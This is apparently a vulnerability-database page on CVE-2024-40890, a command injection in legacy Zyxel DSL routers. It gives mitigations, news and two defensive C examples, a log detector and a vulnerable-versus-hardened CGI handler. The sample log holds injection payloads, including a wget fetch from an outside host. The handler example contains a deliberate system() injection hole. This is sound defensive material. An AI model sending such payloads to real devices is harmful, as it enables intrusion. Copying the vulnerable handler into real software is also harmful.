CVE Radar Logo
CVERadar

CVE-2024-40890

Medium Severity
Zyxel
SVRS
34/100

CVSSv3
NA/10

EPSS
0.19182/1

CVE-2024-40890 is a post-authentication OS command injection vulnerability in the CGI program of the legacy Zyxel VMG4325-B10A DSL CPE. An attacker who can log in to the device's web interface can execute arbitrary OS commands by sending a crafted HTTP POST request. The CVSSv3 field above reads NA because the CVE record is tagged UNSUPPORTED WHEN ASSIGNED (the product is end-of-life), so no independent NVD score is shown; the vendor (CNA) score is 8.8 (High). Exploitation is confirmed: the flaw is tagged In The Wild and was added to CISA KEV on 2025-02-11, which is why the SOCRadar Vulnerability Risk Score (SVRS) of 34 still signals moderate risk despite the unsupported status and the missing CVSS. Because the affected models will not receive a firmware fix, organizations still running them should replace the devices or, until then, keep the management interface off the internet and apply the compensating mitigations below. The case illustrates that an old, unsupported device becomes a live risk the moment its flaws are exploited.

In The Wild
Vendor-advisory
CISA KEV
Exploit Available
2025-02-04

2025-02-12

SOCRadar AI Insight

Description

CVE-2024-40890 is a post-authentication command injection vulnerability present in the CGI program of the legacy DSL CPE Zyxel VMG4325-B10A firmware version 1.00(AAFR.4)C0_20170615. This vulnerability allows an authenticated attacker to execute arbitrary operating system (OS) commands on an affected device by sending a specially crafted HTTP POST request.

The vendor (CNA) CVSS score is 8.8 (High), while the SOCRadar Vulnerability Risk Score (SVRS) shown above is 34, a lower relative ranking. The SVRS does not reduce the urgency here: the vulnerability is tagged "In The Wild" and listed in CISA KEV, meaning it is being exploited against real devices, so immediate action is still required.

Key Insights

  1. OS Command Execution: A crafted POST reaches a CGI program that builds an OS command from request input without neutralizing shell metacharacters (CWE-78). Commands run with the privileges of the CGI handler, potentially giving the attacker full control of the device and a foothold on the network behind it.
  2. Authentication Required, Not Bypassed: The attacker needs a valid login to the device's web interface; this is not an authentication bypass. The same Zyxel advisory (see References) also covers insecure default credentials on these legacy models, and CPE management interfaces exposed to the WAN with default or shared passwords make the "post-authentication" qualifier a weak barrier in practice.
  3. Legacy, End-of-Life Firmware: The affected firmware, 1.00(AAFR.4)C0_20170615, dates from 2017. Devices still in service run code that will not receive fixes, so the exposure is permanent unless the hardware is replaced.
  4. Active Exploitation: The "In The Wild" tag and the CISA KEV listing (2025-02-11) mean attackers are exploiting this flaw in real-world attacks. The sibling issue CVE-2024-40891, reported in the news below, is the telnet-based counterpart of this HTTP-based bug and was seen under exploitation by GreyNoise in late January 2025.

Mitigation Strategies

  1. Replace, Do Not Wait for a Patch: The affected models are legacy DSL CPE that reached end-of-life years ago; Zyxel's advisory (see References) states that no fix will be released and recommends replacing them with a supported, newer-generation product. Until replacement, treat every affected device as exploitable and apply the compensating controls below.
  2. Network Segmentation: Isolate affected devices from critical networks and restrict outbound connections from the device's management plane, so that a compromised CPE cannot be used as a pivot or a download host for further tooling.
  3. Access Control: Disable WAN-side (remote) management of the web interface and telnet, allow administrative access only from trusted LAN or management addresses, and replace default or shared credentials. Because the bug is post-authentication, valid credentials are the attacker's only prerequisite.
  4. IDS/IPS and Logging: Monitor for HTTP POST requests to the device's CGI endpoints whose bodies contain shell metacharacters (URL-encoded or not), and alert on management logins from unexpected sources. A device that has already received such requests should be considered compromised and replaced, since its firmware cannot be trusted or repaired.
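The detection logic behind item 4, as an added example that is not code from this page, from Zyxel, or from any IDS vendor: it flags HTTP POSTs to a CGI path whose form fields carry shell metacharacters, the generic shape of a CWE-78 attempt. The path prefix `/cgi-bin/`, the parameter names and the log lines are constructed assumptions; the real vulnerable endpoint is not published. It splits the body into `&`-separated fields before scanning so that a normal login form is not flagged, and percent-decodes each value so that `%3Bid` is caught as well as `;id`.

```c
/* Added example: flag command-injection-shaped POSTs in constructed web logs.
 * Not code from the page or from Zyxel firmware; "/cgi-bin/" and the
 * parameter names are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Characters a shell treats specially; none belongs in a hostname, interface
 * name or similar value that a router CGI expects. */
static const char SHELL_META[] = ";|&`$(){}<>\n";

/* Percent-decode src into dst (also '+' -> ' '), so that an attacker who
 * sends %3Bid instead of ;id is still caught. */
static void url_decode(const char *src, char *dst, size_t dstlen)
{
    size_t j = 0;
    for (size_t i = 0; src[i] != '\0' && j + 1 < dstlen; i++) {
        if (src[i] == '%' && isxdigit((unsigned char)src[i + 1])
                          && isxdigit((unsigned char)src[i + 2])) {
            char hex[3] = { src[i + 1], src[i + 2], '\0' };
            dst[j++] = (char)strtol(hex, NULL, 16);
            i += 2;
        } else if (src[i] == '+') {
            dst[j++] = ' ';
        } else {
            dst[j++] = src[i];
        }
    }
    dst[j] = '\0';
}

/* Splits an application/x-www-form-urlencoded body on '&' and checks each
 * decoded value. Splitting first matters: '&' is a legitimate field separator
 * but a decoded '&' inside a value (sent as %26) is suspicious. */
int body_has_injection(const char *body)
{
    char copy[1024], decoded[1024];
    if (strlen(body) >= sizeof copy) return 1;   /* oversized body: suspicious */
    strcpy(copy, body);
    char *field = copy;
    while (field != NULL) {
        char *next = strchr(field, '&');
        if (next != NULL) *next++ = '\0';
        const char *value = strchr(field, '=');
        value = value ? value + 1 : field;
        url_decode(value, decoded, sizeof decoded);
        if (strpbrk(decoded, SHELL_META) != NULL) return 1;
        field = next;
    }
    return 0;
}

/* Returns 1 when the request looks like a command-injection attempt:
 * a POST to a CGI endpoint carrying shell metacharacters in a field value. */
int is_injection_attempt(const char *method, const char *path, const char *body)
{
    if (strcmp(method, "POST") != 0) return 0;
    if (strstr(path, "/cgi-bin/") == NULL) return 0;   /* assumed CGI prefix */
    return body_has_injection(body);
}

/* Constructed log format: METHOD<TAB>PATH<TAB>BODY.
 * Returns 1 (flagged), 0 (benign) or -1 (malformed line). */
int classify_log_line(const char *line)
{
    char buf[1024];
    if (strlen(line) >= sizeof buf) return -1;
    strcpy(buf, line);
    char *path = strchr(buf, '\t');
    if (path == NULL) return -1;
    *path++ = '\0';
    char *body = strchr(path, '\t');
    if (body == NULL) return -1;
    *body++ = '\0';
    return is_injection_attempt(buf, path, body);
}

/* Constructed sample traffic: a benign login, two attempts (one URL-encoded)
 * and a GET that carries metacharacters but is not a POST to a CGI. */
const char *const SAMPLE_LOG[] = {
    "POST\t/cgi-bin/login.cgi\tusername=admin&password=1234",
    "POST\t/cgi-bin/wan.cgi\thost=8.8.8.8;wget http://203.0.113.5/x -O /tmp/x",
    "POST\t/cgi-bin/wan.cgi\thost=8.8.8.8%7Cid",
    "GET\t/images/logo.png\tq=;id",
};
const int SAMPLE_LOG_LEN = 4;

/* Counts flagged lines in a log array. */
int count_flagged(const char *const *lines, int n)
{
    int hits = 0;
    for (int i = 0; i < n; i++)
        if (classify_log_line(lines[i]) == 1) hits++;
    return hits;
}

int main(void)
{
    for (int i = 0; i < SAMPLE_LOG_LEN; i++)
        printf("%2d  %s\n", classify_log_line(SAMPLE_LOG[i]), SAMPLE_LOG[i]);
    printf("flagged: %d of %d\n", count_flagged(SAMPLE_LOG, SAMPLE_LOG_LEN), SAMPLE_LOG_LEN);
    return 0;
}
```

On the constructed sample the detector flags the two `wan.cgi` requests and leaves the login and the GET alone. In production the same check belongs in a reverse proxy, WAF or IDS rule in front of the CPE's management interface; a metacharacter match is a strong signal only on endpoints whose parameters should never contain them, so keep the path allowlist tight to avoid false positives on free-text fields.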


Indicators of Compromise

No IOCs found for this CVE

Exploits

Title: Zyxel DSL CPE OS Command Injection Vulnerability
Software Link: https://www.cisa.gov/search?g=CVE-2024-40890
Date: 2025-02-11

News

Flashpoint Weekly Vulnerability Insights and Prioritization Report
Flashpoint Intel Team, 2025-05-01, flashpoint-intel.com
Anticipate, contextualize, and prioritize vulnerabilities to effectively address threats to your organization.

U.S. CISA adds Microsoft Windows, Zyxel device flaws to its Known Exploited Vulnerabilities catalog
Pierluigi Paganini, 2025-02-12, securityaffairs.co
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Windows, Zyxel device flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: The vulnerability CVE-2024-40891 is a command injection issue in Zyxel CPE Series devices that remains unpatched and has not yet [...]

CISA Adds Four Known Exploited Vulnerabilities to Catalog
CISA, 2025-02-11, cisa.gov
CISA has added four vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

Critical Zero-Day Vulnerability in Zyxel Devices Sparks Widespread Exploitation
Shivani Tiwari, 2025-02-04, blogger.com
Cybersecurity researchers at GreyNoise have uncovered widespread exploitation of a critical zero-day vulnerability in Zyxel CPE Series devices, months after it

CVE-2024-40890 | Zyxel VMG4325-B10A up to 1.00(AAFR.4)C0_20170615 os command injection
vuldb.com, 2025-02-04, vuldb.com
A vulnerability classified as critical has been found in Zyxel VMG4325-B10A up to 1.00(AAFR.4)C0_20170615. Affected is an unknown function. The manipulation leads to os command injection. This vulnerability is traded as CVE-2024-40890. It is possible to launch the attack remotely. There is no exploit available.

Attackers actively exploit a critical zero-day in Zyxel CPE Series devices
Pierluigi Paganini, 2025-01-29, securityaffairs.co
Experts warn that threat actors are actively exploiting critical zero-day vulnerability, tracked as CVE-2024-40891, in Zyxel CPE Series devices. GreyNoise researchers are observing active exploitation attempts targeting a zero-day, tracked as CVE-2024-40891, in Zyxel CPE Series devices. The vulnerability is a command injection issue that remains unpatched and has not yet been publicly disclosed. Attackers can exploit [...]

Zyxel CPE Devices Face Active Exploitation Due to Unpatched CVE-2024-40891 Vulnerability
Ajit Jasrotia, 2025-01-29, allhackernews.com
Cybersecurity researchers are warning that a critical zero-day vulnerability impacting Zyxel CPE Series devices is seeing active exploitation attempts in the wild. "Attackers can leverage this vulnerability to execute arbitrary commands on affected devices, leading to complete system compromise, data exfiltration, or network infiltration," GreyNoise researcher Glenn Thorpe said in an alert published Tuesday. The [...]

Social Media

🚨 Attention! CVE-2024-40890: Command injection vulnerability in Zyxel DSL CPE devices. An authenticated attacker can execute OS commands via HTTP. If your device is EoL/EoS, discontinue its use until a mitigation is available. #CyberSecurity #InfoSec #CVE

CVE-2024-40890: (CVSS:8.8, Severity: High, More Details: https://t.co/mxPIe6l2gf) Legacy Zyxel DSL CPE VMG4325-B10A allows authenticated attackers to execute OS commands via crafted HTTP POST request due to a command injection in the CGI program.

[CVE-2024-40890: HIGH] Critical vulnerability in Zyxel VMG4325-B10A firmware v1.00(AAFR.4)C0_20170615 enables OS command execution via crafted HTTP POST request. Keep devices updated to stay secure. #cybersecurity #vulnerability https://t.co/4WS3oaWqqi https://t.co/aPbvsonoDs

CVE-2024-40890 **UNSUPPORTED WHEN ASSIGNED** A post-authentication command injection vulnerability in the CGI program of the legacy DSL CPE Zyxel VMG4325-B10A firmware version 1.00(… https://t.co/tJSs7Sbo3G

Attackers actively exploit a critical zero-day in Zyxel CPE Series devices https://t.co/TNm4vizFud "CVE-2024-40891 is very similar to CVE-2024-40890, with the main difference being that the former is telnet-based while the latter is HTTP-based."

Affected Software

Each affected product is listed as its own configuration (Type OS, Vendor Zyxel):

Configuration  Type  Vendor  Product
1              OS    Zyxel   vmg1312-b10a_firmware
2              OS    Zyxel   vmg1312-b10b_firmware
3              OS    Zyxel   vmg1312-b10e_firmware
4              OS    Zyxel   vmg3312-b10a_firmware
5              OS    Zyxel   vmg3313-b10a_firmware
6              OS    Zyxel   vmg3926-b10b_firmware
7              OS    Zyxel   vmg4325-b10a_firmware
8              OS    Zyxel   vmg4380-b10a_firmware
9              OS    Zyxel   vmg8324-b10a_firmware
10             OS    Zyxel   vmg8924-b10a_firmware
11             OS    Zyxel   sbg3300-n000_firmware
12             OS    Zyxel   sbg3300-nb00_firmware
13             OS    Zyxel   sbg3500-n000_firmware
14             OS    Zyxel   sbg3500-nb00_firmware

References

Reference: Zyxel security advisory for command injection and insecure default credentials vulnerabilities in certain legacy DSL CPE (2025-02-04)
Link: https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-command-injection-and-insecure-default-credentials-vulnerabilities-in-certain-legacy-dsl-cpe-02-04-2025

CWE Details

CWE ID: CWE-78
CWE Name: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Description: The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
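The weakness described above, shown as an added example in C; this is not code from the page or from Zyxel's firmware, and the `host` parameter and the `ping` command are assumptions chosen to make the pattern concrete. The vulnerable handler splices a POST value into a shell command line and hands it to `system()`, which is exactly how a value like `8.8.8.8;id` turns into two commands. The hardened handler does two independent things: it positively validates the value against the characters a hostname can contain (and rejects a leading `-` so the value cannot become an option), and it builds an `argv` array for `execvp` so no shell ever parses the value at all.

```c
/* Added example of CWE-78 in a CGI-style handler, vulnerable and hardened.
 * Not code from the page or from Zyxel; "host" and "ping" are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* VULNERABLE: the untrusted value is spliced into a shell command line.
 * host=8.8.8.8;id yields "ping -c 1 8.8.8.8;id"; /bin/sh runs both commands.
 * Returns the length snprintf reports, like snprintf itself. */
int build_command_vulnerable(const char *host, char *out, size_t outlen)
{
    return snprintf(out, outlen, "ping -c 1 %s", host);
}

void handle_vulnerable(const char *host)
{
    char cmd[256];
    build_command_vulnerable(host, cmd, sizeof cmd);
    system(cmd);                  /* the shell interprets ; | & ` $() and more */
}

/* HARDENED, step 1: positively validate the value. A hostname or IPv4
 * literal needs only letters, digits, '.' and '-', and must be short. */
int validate_host(const char *host)
{
    size_t len = strlen(host);
    if (len == 0 || len > 253) return 0;
    if (host[0] == '-') return 0;            /* would be parsed as an option */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!(isalnum(c) || c == '.' || c == '-')) return 0;
    }
    return 1;
}

/* HARDENED, step 2: never go through a shell. The value becomes exactly one
 * argv element, whatever characters it contains. Returns the argument count,
 * or -1 if the value was rejected or the array is too small. */
int build_argv_hardened(const char *host, const char *argv[], size_t n)
{
    if (n < 5 || !validate_host(host)) return -1;
    argv[0] = "ping";
    argv[1] = "-c";
    argv[2] = "1";
    argv[3] = host;
    argv[4] = NULL;
    return 4;
}

/* Runs the validated command with fork/execvp; returns the child's wait
 * status, or -1 if the value was rejected before anything was executed. */
int handle_hardened(const char *host)
{
    const char *argv[5];
    int status = 0;
    if (build_argv_hardened(host, argv, 5) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execvp(argv[0], (char *const *)argv);
        _exit(127);               /* exec failed; never fall back to a shell */
    }
    waitpid(pid, &status, 0);
    return status;
}

int main(void)
{
    const char *attacker = "8.8.8.8;id";     /* constructed malicious POST value */
    char cmd[256];
    const char *argv[5];
    build_command_vulnerable(attacker, cmd, sizeof cmd);
    printf("vulnerable handler would pass to /bin/sh: %s\n", cmd);
    printf("hardened handler accepts \"%s\": %s\n", attacker,
           build_argv_hardened(attacker, argv, 5) < 0 ? "no, rejected" : "yes");
    printf("hardened handler accepts \"8.8.8.8\": %s\n",
           build_argv_hardened("8.8.8.8", argv, 5) < 0 ? "no" : "yes, as one argv element");
    return 0;
}
```

The two hardening steps are deliberately redundant. Validation alone is fragile (a later change to the command, or a different downstream parser, can reintroduce a bypass), and `execvp` alone still lets a value starting with `-` be read as an option by the target program; together they remove the shell from the path and constrain what the remaining program sees.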
